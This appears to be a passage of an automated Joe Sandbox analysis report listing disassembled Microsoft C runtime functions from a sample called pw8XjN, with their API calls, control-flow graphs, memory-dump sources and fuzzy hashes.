                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 16 6c1465-6c1476 call 6c143a ExitProcess
                                                                                        APIs
                                                                                        • ___crtCorExitProcess.LIBCMT ref: 006C146D
                                                                                          • Part of subcall function 006C143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,006C1472,?,?,006C54EE,000000FF,0000001E,?,006C36FC,?,00000001,?,?,006C2A2A,00000018), ref: 006C1444
                                                                                          • Part of subcall function 006C143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006C1454
                                                                                        • ExitProcess.KERNEL32 ref: 006C1476
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000002A.00000002.3251666953.00000000006C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 006C0000, based on PE: true
                                                                                        • Associated: 0000002A.00000002.3251627784.00000000006C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251689620.00000000006C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251709708.00000000006CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251729622.00000000006CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_42_2_6c0000_pw8XjN.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                        • String ID:
                                                                                        • API String ID: 2427264223-0
                                                                                        • Opcode ID: 91157d3be196d0fbba387e2d2137ed975867de414b3d015b9bf64f2a4d75054f
                                                                                        • Instruction ID: f9fc7147466ed18e90acaaadd7bf49a44271bc8d93bca6099a2bffd32285a116
                                                                                        • Opcode Fuzzy Hash: 91157d3be196d0fbba387e2d2137ed975867de414b3d015b9bf64f2a4d75054f
                                                                                        • Instruction Fuzzy Hash: 62B09B31000108BFDB152F11DC09D5D3F57FB41350F50C014F4094A131DF719D529594
                                                                                        Function 006C261B Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 19 6c261b-6c263d HeapCreate 20 6c263f-6c2640 19->20 21 6c2641-6c264a 19->21
                                                                                        APIs
                                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 006C2630
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000002A.00000002.3251666953.00000000006C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 006C0000, based on PE: true
                                                                                        • Associated: 0000002A.00000002.3251627784.00000000006C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251689620.00000000006C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251709708.00000000006CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251729622.00000000006CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_42_2_6c0000_pw8XjN.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 10892065-0
                                                                                        • Opcode ID: 3a322d0ea8f6df2a03b95ce2f721dce159a9508faa415ad9eceb3c927cedd388
                                                                                        • Instruction ID: f8f2f23088680f027f46d41f7553b7460d3f502faa218647e080d9df98d39c36
                                                                                        • Opcode Fuzzy Hash: 3a322d0ea8f6df2a03b95ce2f721dce159a9508faa415ad9eceb3c927cedd388
                                                                                        • Instruction Fuzzy Hash: 51D05E326543455EDB109F75BC19F723BDDD384395F10A435BD0CC6250E670C5909A10
                                                                                        Function 006C1681 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 22 6c1681-6c168d call 6c1555 24 6c1692-6c1696 22->24
                                                                                        APIs
                                                                                        • _doexit.LIBCMT ref: 006C168D
                                                                                          • Part of subcall function 006C1555: __lock.LIBCMT ref: 006C1563
                                                                                          • Part of subcall function 006C1555: __decode_pointer.LIBCMT ref: 006C159A
                                                                                          • Part of subcall function 006C1555: __decode_pointer.LIBCMT ref: 006C15AF
                                                                                          • Part of subcall function 006C1555: __decode_pointer.LIBCMT ref: 006C15D9
                                                                                          • Part of subcall function 006C1555: __decode_pointer.LIBCMT ref: 006C15EF
                                                                                          • Part of subcall function 006C1555: __decode_pointer.LIBCMT ref: 006C15FC
                                                                                          • Part of subcall function 006C1555: __initterm.LIBCMT ref: 006C162B
                                                                                          • Part of subcall function 006C1555: __initterm.LIBCMT ref: 006C163B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000002A.00000002.3251666953.00000000006C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 006C0000, based on PE: true
                                                                                        • Associated: 0000002A.00000002.3251627784.00000000006C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251689620.00000000006C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251709708.00000000006CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251729622.00000000006CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_42_2_6c0000_pw8XjN.jbxd
                                                                                        Similarity
                                                                                        • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                        • String ID:
                                                                                        • API String ID: 1597249276-0
                                                                                        • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                        • Instruction ID: f37cdba78d740c8b5ac638096a922dda3b7ac92db9f7e91a814d2d22bd7de6cb
                                                                                        • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                        • Instruction Fuzzy Hash: 4DB0927258020873DB202586AC03F163A0A87C2BA0E650024FA0C1D1E2A9A2A961808A

                                                                                        Non-executed Functions

                                                                                        Function 006C10CC Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 006C1346
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006C135B
                                                                                        • UnhandledExceptionFilter.KERNEL32(006C816C), ref: 006C1366
                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 006C1382
                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 006C1389
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000002A.00000002.3251666953.00000000006C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 006C0000, based on PE: true
                                                                                        • Associated: 0000002A.00000002.3251627784.00000000006C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251689620.00000000006C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251709708.00000000006CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251729622.00000000006CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_42_2_6c0000_pw8XjN.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 2579439406-0
                                                                                        • Opcode ID: 94624d01eb1d1d45506aff7a74cfcf4b4391ab0f5a1154bfdc060128cc74aa6e
                                                                                        • Instruction ID: 9c30066bdc23509cea5ed2aba1a73ebab971d9c1d3cf97f52eb5c9568706e777
                                                                                        • Opcode Fuzzy Hash: 94624d01eb1d1d45506aff7a74cfcf4b4391ab0f5a1154bfdc060128cc74aa6e
                                                                                        • Instruction Fuzzy Hash: BF21CFB4501248DFC760DFA4ED48E743BB2FF4834AF00641AE50A87B61DB786989CB46
                                                                                        Function 006C21E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,006C9458,0000000C,006C2320,00000000,00000000,?,006C174F,00000003,?,?,?,?,?,?,006C10F6), ref: 006C21F7
                                                                                        • __crt_waiting_on_module_handle.LIBCMT ref: 006C2202
                                                                                          • Part of subcall function 006C13E1: Sleep.KERNEL32(000003E8,00000000,?,006C2148,KERNEL32.DLL,?,006C2194,?,006C174F,00000003), ref: 006C13ED
                                                                                          • Part of subcall function 006C13E1: GetModuleHandleW.KERNEL32(?,?,006C2148,KERNEL32.DLL,?,006C2194,?,006C174F,00000003,?,?,?,?,?,?,006C10F6), ref: 006C13F6
                                                                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 006C222B
                                                                                        • GetProcAddress.KERNEL32(?,DecodePointer), ref: 006C223B
                                                                                        • __lock.LIBCMT ref: 006C225D
                                                                                        • InterlockedIncrement.KERNEL32(006CA4D8), ref: 006C226A
                                                                                        • __lock.LIBCMT ref: 006C227E
                                                                                        • ___addlocaleref.LIBCMT ref: 006C229C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000002A.00000002.3251666953.00000000006C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 006C0000, based on PE: true
                                                                                        • Associated: 0000002A.00000002.3251627784.00000000006C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251689620.00000000006C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251709708.00000000006CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251729622.00000000006CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_42_2_6c0000_pw8XjN.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                        • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                        • API String ID: 1028249917-2843748187
                                                                                        • Opcode ID: 4d36bcd69978b30c9dab9d01c268679eb20224c0b6ae8a7813aecd0b015fe3bd
                                                                                        • Instruction ID: 422fd504357a223fb1d3861fdd81d5b0e1b50d59b19361ba9e2a503d375dce7e
                                                                                        • Opcode Fuzzy Hash: 4d36bcd69978b30c9dab9d01c268679eb20224c0b6ae8a7813aecd0b015fe3bd
                                                                                        • Instruction Fuzzy Hash: 2111C0709007029FD760EF76D805FBABBE2EF50314F10441EE899933A0CF749A408B28
                                                                                        Function 006C40A0 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 170 6c40a0-6c40bb call 6c264c call 6c2345 175 6c40bd-6c40c1 170->175 176 6c40da-6c40f2 call 6c2aa0 170->176 175->176 178 6c40c3 175->178 181 6c412a-6c4136 call 6c413b 176->181 182 6c40f4-6c40f6 176->182 180 6c40c6-6c40c8 178->180 183 6c40ca-6c40d1 call 6c1411 180->183 184 6c40d2-6c40d9 call 6c2691 180->184 181->180 185 6c40f8-6c4101 InterlockedDecrement 182->185 186 6c4112-6c4124 InterlockedIncrement 182->186 183->184 185->186 191 6c4103-6c4109 185->191 186->181 191->186 194 6c410b-6c4111 call 6c35ee 191->194 194->186
                                                                                        APIs
                                                                                        • __getptd.LIBCMT ref: 006C40AC
                                                                                          • Part of subcall function 006C2345: __getptd_noexit.LIBCMT ref: 006C2348
                                                                                          • Part of subcall function 006C2345: __amsg_exit.LIBCMT ref: 006C2355
                                                                                        • __amsg_exit.LIBCMT ref: 006C40CC
                                                                                        • __lock.LIBCMT ref: 006C40DC
                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 006C40F9
                                                                                        • InterlockedIncrement.KERNEL32(023A2AE0), ref: 006C4124
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000002A.00000002.3251666953.00000000006C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 006C0000, based on PE: true
                                                                                        • Associated: 0000002A.00000002.3251627784.00000000006C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251689620.00000000006C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251709708.00000000006CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251729622.00000000006CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_42_2_6c0000_pw8XjN.jbxd
                                                                                        Similarity
                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                        • String ID:
                                                                                        • API String ID: 4271482742-0
                                                                                        • Opcode ID: 51817c33afb5d0d24b2d56db5d2e302b50440adc8a0d52bfee18decfa8c8d844
                                                                                        • Instruction ID: b2e481e20fd0bed66d1ea802b2d479fde3c13347de05f15d58b55462fd11dd1b
                                                                                        • Opcode Fuzzy Hash: 51817c33afb5d0d24b2d56db5d2e302b50440adc8a0d52bfee18decfa8c8d844
                                                                                        • Instruction Fuzzy Hash: 3A01A131A016169BC761EF658816FB97763FB14710F15400DE900A7791CF34A991CBEA
                                                                                        Function 006C35EE Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 197 6c35ee-6c35ff call 6c264c 200 6c3676-6c367b call 6c2691 197->200 201 6c3601-6c3608 197->201 203 6c364d 201->203 204 6c360a-6c3622 call 6c2aa0 call 6c45e4 201->204 206 6c364e-6c365e HeapFree 203->206 214 6c362d-6c363d call 6c3644 204->214 215 6c3624-6c362c call 6c4614 204->215 206->200 208 6c3660-6c3675 call 6c2c72 GetLastError call 6c2c30 206->208 208->200 214->200 222 6c363f-6c3642 214->222 215->214 222->206
                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 006C360C
                                                                                          • Part of subcall function 006C2AA0: __mtinitlocknum.LIBCMT ref: 006C2AB6
                                                                                          • Part of subcall function 006C2AA0: __amsg_exit.LIBCMT ref: 006C2AC2
                                                                                          • Part of subcall function 006C2AA0: EnterCriticalSection.KERNEL32(?,?,?,006C5600,00000004,006C9628,0000000C,006C3746,?,?,00000000,00000000,00000000,?,006C22F7,00000001), ref: 006C2ACA
                                                                                        • ___sbh_find_block.LIBCMT ref: 006C3617
                                                                                        • ___sbh_free_block.LIBCMT ref: 006C3626
                                                                                        • HeapFree.KERNEL32(00000000,?,006C9568,0000000C,006C2A81,00000000,006C94C8,0000000C,006C2ABB,?,?,?,006C5600,00000004,006C9628,0000000C), ref: 006C3656
                                                                                        • GetLastError.KERNEL32(?,006C5600,00000004,006C9628,0000000C,006C3746,?,?,00000000,00000000,00000000,?,006C22F7,00000001,00000214), ref: 006C3667
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000002A.00000002.3251666953.00000000006C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 006C0000, based on PE: true
                                                                                        • Associated: 0000002A.00000002.3251627784.00000000006C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251689620.00000000006C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251709708.00000000006CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251729622.00000000006CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_42_2_6c0000_pw8XjN.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 2714421763-0
                                                                                        • Opcode ID: 87d3bd4d06605c1bae179c07b054d5d72a4b4859672978dce595a784da7013b3
                                                                                        • Instruction ID: b87978c99587ee08d09098e1844538fc9251a90f2a1fa42f8f2f167354651e73
                                                                                        • Opcode Fuzzy Hash: 87d3bd4d06605c1bae179c07b054d5d72a4b4859672978dce595a784da7013b3
                                                                                        • Instruction Fuzzy Hash: 52016271D04326BADB60AB729C1AFBD3667EF11760F60900DF800A7391CF348640CA6D
                                                                                        Function 006C3E04 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 223 6c3e04-6c3e1f call 6c264c call 6c2345 228 6c3e21-6c3e25 223->228 229 6c3e43-6c3e6c call 6c2aa0 call 6c3dc6 call 6c3e6e 223->229 228->229 230 6c3e27-6c3e2c call 6c2345 228->230 236 6c3e2f-6c3e31 229->236 230->236 239 6c3e3b-6c3e42 call 6c2691 236->239 240 6c3e33-6c3e3a call 6c1411 236->240 240->239
                                                                                        APIs
                                                                                        • __getptd.LIBCMT ref: 006C3E10
                                                                                          • Part of subcall function 006C2345: __getptd_noexit.LIBCMT ref: 006C2348
                                                                                          • Part of subcall function 006C2345: __amsg_exit.LIBCMT ref: 006C2355
                                                                                        • __getptd.LIBCMT ref: 006C3E27
                                                                                        • __amsg_exit.LIBCMT ref: 006C3E35
                                                                                        • __lock.LIBCMT ref: 006C3E45
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000002A.00000002.3251666953.00000000006C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 006C0000, based on PE: true
                                                                                        • Associated: 0000002A.00000002.3251627784.00000000006C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251689620.00000000006C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251709708.00000000006CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 0000002A.00000002.3251729622.00000000006CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_42_2_6c0000_pw8XjN.jbxd
                                                                                        Similarity
                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                        • String ID:
                                                                                        • API String ID: 3521780317-0
                                                                                        • Opcode ID: 345ad5e2e6ea01c4163808680e2ad4badc8addeceb83a716960588bf3ef0f7b1
                                                                                        • Instruction ID: b9ffb552ff59f373150d38152f29394c3f4e243c0f64ad411a0951a4e85abff9
                                                                                        • Opcode Fuzzy Hash: 345ad5e2e6ea01c4163808680e2ad4badc8addeceb83a716960588bf3ef0f7b1
                                                                                        • Instruction Fuzzy Hash: B2F090329003268BD7A0FBB5841AFBD73A3EF48710F10854EE845973D2CF749A018B6A